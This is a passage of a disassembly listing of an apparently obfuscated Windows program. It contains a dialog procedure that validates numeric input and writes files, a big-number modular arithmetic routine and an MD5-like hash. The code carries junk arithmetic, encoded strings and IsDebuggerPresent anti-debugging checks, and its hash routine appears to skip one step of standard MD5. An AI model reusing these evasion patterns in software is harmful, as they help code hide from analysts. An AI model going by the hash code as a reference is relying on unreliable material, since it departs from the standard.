mov [ebp+var_6], eax
loc_40B13C: ; CODE XREF: sub_40B01B+117�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B01B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B143 proc near ; DATA XREF: sub_40A766+46A�o
var_27A = word ptr -27Ah
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_248 = byte ptr -248h
var_149 = byte ptr -149h
var_144 = word ptr -144h
var_142 = byte ptr -142h
var_13D = byte ptr -13Dh
var_135 = word ptr -135h
var_133 = byte ptr -133h
var_132 = byte ptr -132h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = word ptr -120h
var_11E = word ptr -11Eh
var_11B = byte ptr -11Bh
var_11A = word ptr -11Ah
var_118 = word ptr -118h
var_115 = byte ptr -115h
var_114 = dword ptr -114h
var_10D = byte ptr -10Dh
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 27Ch
push ebx
push esi
push edi
call sub_40C538 ; RtlGetLastWin32Error
mov eax, [ebp+arg_4]
cmp eax, 10h
jz loc_40B36D
jg short loc_40B170
cmp eax, 2
jz loc_40B353
jmp loc_40B9CF
; ---------------------------------------------------------------------------
loc_40B170: ; CODE XREF: sub_40B143+1D�j
cmp eax, 111h
jz loc_40B47A
cmp eax, 113h
jz short loc_40B1B1
cmp eax, 111h
jl loc_40B9CF
cmp eax, 138h
jz loc_40B392
jmp loc_40B9CF
; ---------------------------------------------------------------------------
lea edi, [ebp+var_132]
lea esi, a9O1 ; " 9'O1"
mov ecx, 3
rep movsw
loc_40B1B1: ; CODE XREF: sub_40B143+3D�j
lea edi, [ebp+var_133]
lea esi, byte_445BEA
xor ecx, ecx
inc ecx
rep movsb
cmp dword_43B218, 0
jz loc_40B2FA
mov byte ptr [ebp+var_250+3], 0A1h
movzx eax, byte ptr [ebp+var_250+3]
imul eax, 1F49h
mov byte ptr [ebp+var_250+3], al
push 9
push offset aST ; "éĀĪāĻĒČĪŁ"
call sub_40129C
push eax
push dword_43B218
call sub_408DEF
mov [ebp+var_254], eax
push 8
push offset aS ; "čÕŻĮĀßČß"
call sub_40129C
push eax
push [ebp+var_254]
call sub_408DEF
add esp, 20h
mov [ebp+var_258], eax
call sub_40C514 ; GetCurrentThreadId
lea eax, [ebp+var_268]
push eax
push [ebp+var_258]
call sub_40C778 ; GetWindowRect
or eax, eax
jz loc_40B2FA
lea eax, [ebp+var_278]
push eax
push ds:dword_41EB84
call sub_40C778 ; GetWindowRect
or eax, eax
jz loc_40B2FA
mov byte ptr [ebp+var_250+2], 38h
add byte ptr [ebp+var_250+2], 25h
mov eax, [ebp+var_260]
sub eax, [ebp+var_268]
sub eax, 4
mov edx, [ebp+var_270]
sub edx, [ebp+var_278]
cmp eax, edx
jnz short loc_40B2AD
mov eax, [ebp+var_25C]
sub eax, [ebp+var_264]
sub eax, 4
mov edx, [ebp+var_26C]
sub edx, [ebp+var_274]
cmp eax, edx
jz short loc_40B2FA
loc_40B2AD: ; CODE XREF: sub_40B143+149�j
call sub_40C514 ; GetCurrentThreadId
push 1
mov eax, [ebp+var_25C]
sub eax, [ebp+var_264]
push eax
mov eax, [ebp+var_260]
sub eax, [ebp+var_268]
push eax
push 0
push 0
push ds:dword_41EB84
call sub_40C8A4 ; MoveWindow
mov [ebp+var_27A], 2EFFh
movzx eax, [ebp+var_27A]
imul eax, 4AB4h
mov [ebp+var_27A], ax
loc_40B2FA: ; CODE XREF: sub_40B143+86�j
; sub_40B143+FE�j ...
cmp dword_43B214, 0
jz loc_40BA03
lea edi, [ebp+var_254+1]
lea esi, aEv ; "ev# "
mov ecx, 5
rep movsb
mov eax, dword_43B214
mov dword_43B218, eax
call sub_40C598 ; GetTickCount
and dword_43B214, 0
push dword_43B218
call sub_408E89
pop ecx
mov word ptr [ebp+var_250+2], 4C5Ah
add word ptr [ebp+var_250+2], 7318h
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B353: ; CODE XREF: sub_40B143+22�j
mov eax, ds:dword_41B89C
cmp [ebp+arg_0], eax
jnz loc_40BA03
push 0
call sub_40C874 ; PostQuitMessage
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B36D: ; CODE XREF: sub_40B143+17�j
mov eax, ds:dword_41B89C
cmp [ebp+arg_0], eax
jnz short loc_40B37F
push [ebp+arg_0]
call sub_40C898 ; DestroyWindow
loc_40B37F: ; CODE XREF: sub_40B143+232�j
mov [ebp+var_10D], 7Dh
add [ebp+var_10D], 1
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B392: ; CODE XREF: sub_40B143+4F�j
mov eax, [ebp+arg_C]
mov [ebp+var_12C], eax
mov ax, word_445BF0
mov [ebp+var_135], ax
mov eax, [ebp+var_12C]
cmp eax, ds:dword_431CFC
jz short loc_40B3E2
cmp eax, ds:dword_413F70
jz short loc_40B3E2
cmp eax, ds:dword_41A864
jz short loc_40B3E2
cmp eax, ds:dword_433FE4
jz short loc_40B3E2
cmp eax, ds:dword_431D00
jz short loc_40B3E2
cmp eax, ds:dword_439328
jnz loc_40BA03
loc_40B3E2: ; CODE XREF: sub_40B143+271�j
; sub_40B143+279�j ...
call sub_40C5A4 ; GetVersion
mov eax, [ebp+var_12C]
cmp eax, ds:dword_431D00
jz short loc_40B3FD
cmp eax, ds:dword_439328
jnz short loc_40B40C
loc_40B3FD: ; CODE XREF: sub_40B143+2B0�j
push 1010B0h
push [ebp+arg_8]
call sub_40C8E0 ; SetTextColor
jmp short loc_40B416
; ---------------------------------------------------------------------------
loc_40B40C: ; CODE XREF: sub_40B143+2B8�j
push 0
push [ebp+arg_8]
call sub_40C8E0 ; SetTextColor
loc_40B416: ; CODE XREF: sub_40B143+2C7�j
push 0FFFFFFh
push [ebp+arg_8]
call sub_40C8D4 ; SetBkColor
call sub_40C5A4 ; GetVersion
and [ebp+var_260], 0
and [ebp+var_25C], 0
lea eax, [ebp+var_260]
push eax
call sub_40C8EC ; CreateBrushIndirect
mov [ebp+var_254], eax
mov word ptr [ebp+var_250+2], 72AAh
movzx eax, word ptr [ebp+var_250+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_250+2], ax
mov eax, [ebp+var_254]
jmp loc_40BA03
; ---------------------------------------------------------------------------
call sub_40C538 ; RtlGetLastWin32Error
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B47A: ; CODE XREF: sub_40B143+32�j
lea edi, [ebp+var_13D]
lea esi, aV880k ; "8+8 0k"
movsd
movsd
push 2
push offset aI ; "Ž"
call sub_40129C
push offset byte_432F00
push eax
lea edi, [ebp+var_248]
push edi
call sub_40CA30
add esp, 14h
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_431D04
call sub_40C76C ; GetWindowTextA
lea edi, [ebp+var_142]
lea esi, aA?5m ; "A?5m"
mov ecx, 5
rep movsb
cmp [ebp+var_FF], 0
jnz short loc_40B511
call sub_40C538 ; RtlGetLastWin32Error
push 1Fh
push offset word_445C82
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40C7F0 ; MessageBoxA
push ds:dword_431D04
call sub_40C7A8 ; SetFocus
call sub_40C508 ; GetCurrentProcessId
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B511: ; CODE XREF: sub_40B143+397�j
push 5
push offset aINi ; "ŽŽ"
call sub_40129C
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_248]
push edi
push eax
lea edi, [ebp+var_248]
push edi
call sub_40CA30
add esp, 18h
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_41DA7C
call sub_40C76C ; GetWindowTextA
mov [ebp+var_114], 2AEEh
inc [ebp+var_114]
cmp [ebp+var_FF], 0
jnz short loc_40B5C8
call sub_40C508 ; GetCurrentProcessId
push 1Eh
push offset byte_445C5D
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40C7F0 ; MessageBoxA
mov word ptr [ebp+var_250+2], 5B80h
movzx eax, word ptr [ebp+var_250+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_250+2], ax
push ds:dword_41DA7C
call sub_40C7A8 ; SetFocus
mov [ebp+var_254], 12FAh
inc [ebp+var_254]
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B5C8: ; CODE XREF: sub_40B143+426�j
push 5
push offset aIAi ; "ŽŽ"
call sub_40129C
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_248]
push edi
push eax
lea edi, [ebp+var_248]
push edi
call sub_40CA30
add esp, 18h
call sub_40C574 ; GetProcessHeap
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_41DA74
call sub_40C76C ; GetWindowTextA
call sub_40C538 ; RtlGetLastWin32Error
cmp [ebp+var_FF], 0
jz loc_40B758
call sub_40C508 ; GetCurrentProcessId
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40B62E: ; CODE XREF: sub_40B143+4F0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B62E
cmp eax, 4
jb loc_40B758
call sub_40C508 ; GetCurrentProcessId
mov [ebp+var_101], 0
jmp short loc_40B66E
; ---------------------------------------------------------------------------
loc_40B64C: ; CODE XREF: sub_40B143+544�j
movzx eax, [ebp+var_101]
mov al, [ebp+eax+var_FF]
cmp al, 30h
jl short loc_40B662
cmp al, 39h
jle short loc_40B667
loc_40B662: ; CODE XREF: sub_40B143+519�j
jmp loc_40B758
; ---------------------------------------------------------------------------
loc_40B667: ; CODE XREF: sub_40B143+51D�j
add [ebp+var_101], 1
loc_40B66E: ; CODE XREF: sub_40B143+507�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40B677: ; CODE XREF: sub_40B143+539�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B677
movzx esi, [ebp+var_101]
cmp esi, eax
jb short loc_40B64C
mov [ebp+var_108], 6B03h
mov eax, [ebp+var_108]
mov edx, eax
add edx, eax
mov [ebp+var_108], edx
mov [ebp+var_100], 0
jmp loc_40B737
; ---------------------------------------------------------------------------
loc_40B6AF: ; CODE XREF: sub_40B143+60D�j
mov word ptr [ebp+var_250], 0DE0h
inc word ptr [ebp+var_250]
call sub_40C634 ; IsDebuggerPresent
mov al, [ebp+var_100]
mov byte ptr [ebp+var_250+3], al
jmp short loc_40B6FB
; ---------------------------------------------------------------------------
loc_40B6D2: ; CODE XREF: sub_40B143+5D1�j
movzx eax, byte ptr [ebp+var_250+3]
movsx eax, [ebp+eax+var_FF]
movzx edx, [ebp+var_100]
movsx edx, [ebp+edx+var_FF]
cmp eax, edx
jnz short loc_40B716
add byte ptr [ebp+var_250+3], 1
loc_40B6FB: ; CODE XREF: sub_40B143+58D�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40B704: ; CODE XREF: sub_40B143+5C6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B704
movzx esi, byte ptr [ebp+var_250+3]
cmp esi, eax
jb short loc_40B6D2
loc_40B716: ; CODE XREF: sub_40B143+5AF�j
call sub_40C508 ; GetCurrentProcessId
movzx eax, byte ptr [ebp+var_250+3]
movzx edx, [ebp+var_100]
sub eax, edx
cmp eax, 3
jg short loc_40B758
add [ebp+var_100], 1
loc_40B737: ; CODE XREF: sub_40B143+567�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40B740: ; CODE XREF: sub_40B143+602�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B740
movzx esi, [ebp+var_100]
cmp esi, eax
jb loc_40B6AF
jmp short loc_40B7BC
; ---------------------------------------------------------------------------
loc_40B758: ; CODE XREF: sub_40B143+4D7�j
; sub_40B143+4F5�j ...
mov eax, dword_43B098
add eax, 7C4h
push eax
call sub_40C9B8
push 35h
push offset byte_445C21
call sub_40129C
mov [ebp+var_250], eax
push 13h
push offset byte_445C0D
call sub_40129C
add esp, 14h
push 0
push eax
mov edi, [ebp+var_250]
push edi
push 0
call sub_40C7F0 ; MessageBoxA
call sub_40C598 ; GetTickCount
push ds:dword_41DA74
call sub_40C7A8 ; SetFocus
mov ax, word_445BFF
mov [ebp+var_144], ax
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B7BC: ; CODE XREF: sub_40B143+613�j
push 5
push offset aINi ; "ŽŽ"
call sub_40129C
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_248]
push edi
push eax
lea edi, [ebp+var_248]
push edi
call sub_40CA30
add esp, 18h
mov [ebp+var_115], 1Ch
sub [ebp+var_115], 1Fh
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_41EA80
call sub_40C67C ; CreateFileA
mov [ebp+var_128], eax
push 2
push 0
push 0
push eax
call sub_40C6AC ; SetFilePointer
lea ecx, [ebp+var_248]
or eax, 0FFFFFFFFh
loc_40B828: ; CODE XREF: sub_40B143+6EA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B828
push 0
lea esi, [ebp+var_24C]
push esi
push eax
lea edi, [ebp+var_248]
push edi
push [ebp+var_128]
call sub_40C730 ; WriteFile
push 2
push offset aAz ; " §"
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_24C]
push edi
mov edi, 0Eh
sub edi, dword_43B098
push edi
push eax
push [ebp+var_128]
call sub_40C730 ; WriteFile
mov [ebp+var_10C], 57C0h
mov eax, [ebp+var_10C]
mov edx, eax
add edx, eax
mov [ebp+var_10C], edx
push [ebp+var_128]
call sub_40C55C ; CloseHandle
mov [ebp+var_118], 2DFCh
sub [ebp+var_118], 4065h
push ds:dword_41EB84
call sub_40C898 ; DestroyWindow
lea edi, [ebp+var_149]
lea esi, aShzq ; "ShzQ"
mov ecx, 5
rep movsb
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40F280
call sub_40C67C ; CreateFileA
mov [ebp+var_128], eax
call sub_40C5A4 ; GetVersion
push 2
push 0
push 0
push [ebp+var_128]
call sub_40C6AC ; SetFilePointer
mov [ebp+var_11A], 34D4h
sub [ebp+var_11A], 5BB2h
lea ecx, byte_432F00
or eax, 0FFFFFFFFh
loc_40B920: ; CODE XREF: sub_40B143+7E2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B920
mov edi, eax
push 0
lea esi, [ebp+var_24C]
push esi
push edi
push offset byte_432F00
push [ebp+var_128]
call sub_40C730 ; WriteFile
mov [ebp+var_11B], 99h
add [ebp+var_11B], 1
push 1
push offset aN_1 ; ""
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_24C]
push edi
mov edi, 3
sub edi, dword_43B094
push edi
push eax
push [ebp+var_128]
call sub_40C730 ; WriteFile
call sub_40C634 ; IsDebuggerPresent
push [ebp+var_128]
call sub_40C55C ; CloseHandle
mov [ebp+var_11E], 7327h
movzx eax, [ebp+var_11E]
imul eax, 3B23h
mov [ebp+var_11E], ax
push 5
push ds:dword_41C950
call sub_40C880 ; ShowWindow
mov [ebp+var_120], 519Ah
sub [ebp+var_120], 4248h
jmp short loc_40BA03
; ---------------------------------------------------------------------------
loc_40B9CF: ; CODE XREF: sub_40B143+28�j
; sub_40B143+44�j ...
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C8B0 ; DefWindowProcA
jmp short loc_40BA03
; ---------------------------------------------------------------------------
mov [ebp+var_124], 2003h
mov eax, 20Bh
mul [ebp+var_124]
mov [ebp+var_254], eax
mov [ebp+var_124], eax
loc_40BA03: ; CODE XREF: sub_40B143+1BE�j
; sub_40B143+20B�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B143 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA0C proc near ; CODE XREF: sub_406E2B+1A�p
; sub_406E2B+35�p
jmp ds:dword_447340
sub_40BA0C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA18 proc near ; CODE XREF: sub_4053A1+C4�p
jmp ds:dword_44734C
sub_40BA18 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA24 proc near ; CODE XREF: sub_4053A1+131�p
jmp ds:dword_447350
sub_40BA24 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA30 proc near ; CODE XREF: sub_4069E2+5F�p
jmp ds:dword_44735C
sub_40BA30 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA3C proc near ; CODE XREF: sub_4069E2+35�p
jmp ds:dword_447360
sub_40BA3C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA48 proc near ; CODE XREF: sub_4069E2+22�p
jmp ds:dword_447364
sub_40BA48 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA54 proc near ; CODE XREF: sub_406987+4C�p
jmp ds:dword_447368
sub_40BA54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA60 proc near ; CODE XREF: sub_4088A5+1D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_446C54
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_40BB2B
xor edx, edx
loc_40BA90: ; CODE XREF: sub_40BA60+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_40BAA2
mov edx, [ebp+arg_4]
call sub_40BABC
loc_40BAA2: ; CODE XREF: sub_40BA60+38�j
lea edx, dword_446C54
call sub_40BABC
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_40BA90
popa
pop ebp
retn 10h
sub_40BA60 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40BABC proc near ; CODE XREF: sub_40BA60+3D�p
; sub_40BA60+48�p
lea edi, dword_446C14
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_446C54
call sub_40BB2B
loc_40BAD6: ; CODE XREF: sub_40BABC+5D�j
lea edi, dword_446C14
mov ecx, 10h
xor eax, eax
loc_40BAE3: ; CODE XREF: sub_40BABC+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_40BAE3
call sub_40BB3C
bt dword_446C54, ebx
jnb short loc_40BB18
mov esi, edx
lea edi, dword_446C14
xor eax, eax
mov ecx, 10h
loc_40BB07: ; CODE XREF: sub_40BABC+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BB07
call sub_40BB3C
loc_40BB18: ; CODE XREF: sub_40BABC+3A�j
dec ebx
jns short loc_40BAD6
mov edi, edx
lea esi, dword_446C14
mov ecx, 10h
rep movsd
retn
sub_40BABC endp
; =============== S U B R O U T I N E =======================================
sub_40BB2B proc near ; CODE XREF: sub_40BA60+29�p
; sub_40BABC+15�p
mov ebx, 1FFh
loc_40BB30: ; CODE XREF: sub_40BB2B+B�j
bt [edi], ebx
jb short locret_40BB38
dec ebx
jnz short loc_40BB30
locret_40BB38: ; CODE XREF: sub_40BB2B+8�j
retn
sub_40BB2B endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40BB3C proc near ; CODE XREF: sub_40BABC+2E�p
; sub_40BABC+57�p
lea esi, dword_446C14
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_40BB4A: ; CODE XREF: sub_40BB3C+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_40BB73
ja short loc_40BB57
dec ecx
jns short loc_40BB4A
loc_40BB57: ; CODE XREF: sub_40BB3C+16�j
mov esi, [ebp+14h]
lea edi, dword_446C14
xor eax, eax
mov ecx, 10h
loc_40BB67: ; CODE XREF: sub_40BB3C+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BB67
locret_40BB73: ; CODE XREF: sub_40BB3C+14�j
retn
sub_40BB3C endp
; =============== S U B R O U T I N E =======================================
sub_40BB74 proc near ; CODE XREF: sub_40BBC5+32�p
; sub_40BBC5+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_40BB74 endp
; =============== S U B R O U T I N E =======================================
sub_40BB81 proc near ; CODE XREF: sub_40BBC5+219�p
; sub_40BBC5+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_40BB81 endp
; =============== S U B R O U T I N E =======================================
sub_40BB8E proc near ; CODE XREF: sub_40BBC5+420�p
; sub_40BBC5+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_40BB8E endp
; =============== S U B R O U T I N E =======================================
sub_40BB95 proc near ; CODE XREF: sub_40BBC5+627�p
; sub_40BBC5+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_40BB95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB9E proc near ; CODE XREF: sub_4088D5+94�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_40BB9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BBC5 proc near ; CODE XREF: sub_4088D5+B1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_446C94, eax
mov eax, [edi+4]
mov dword_446C98, eax
mov eax, [edi+8]
mov dword_446C9C, eax
mov eax, [edi+0Ch]
mov dword_446CA0, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB74
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB74
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB74
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB74
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB74
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB74
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB74
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB74
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB74
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB74
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB74
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB74
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB74
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB74
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB74
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB81
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB81
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB81
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB81
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB81
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB81
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB81
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB81
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB81
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB81
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB81
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB81
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB81
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB81
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB81
add eax, [edi+8]
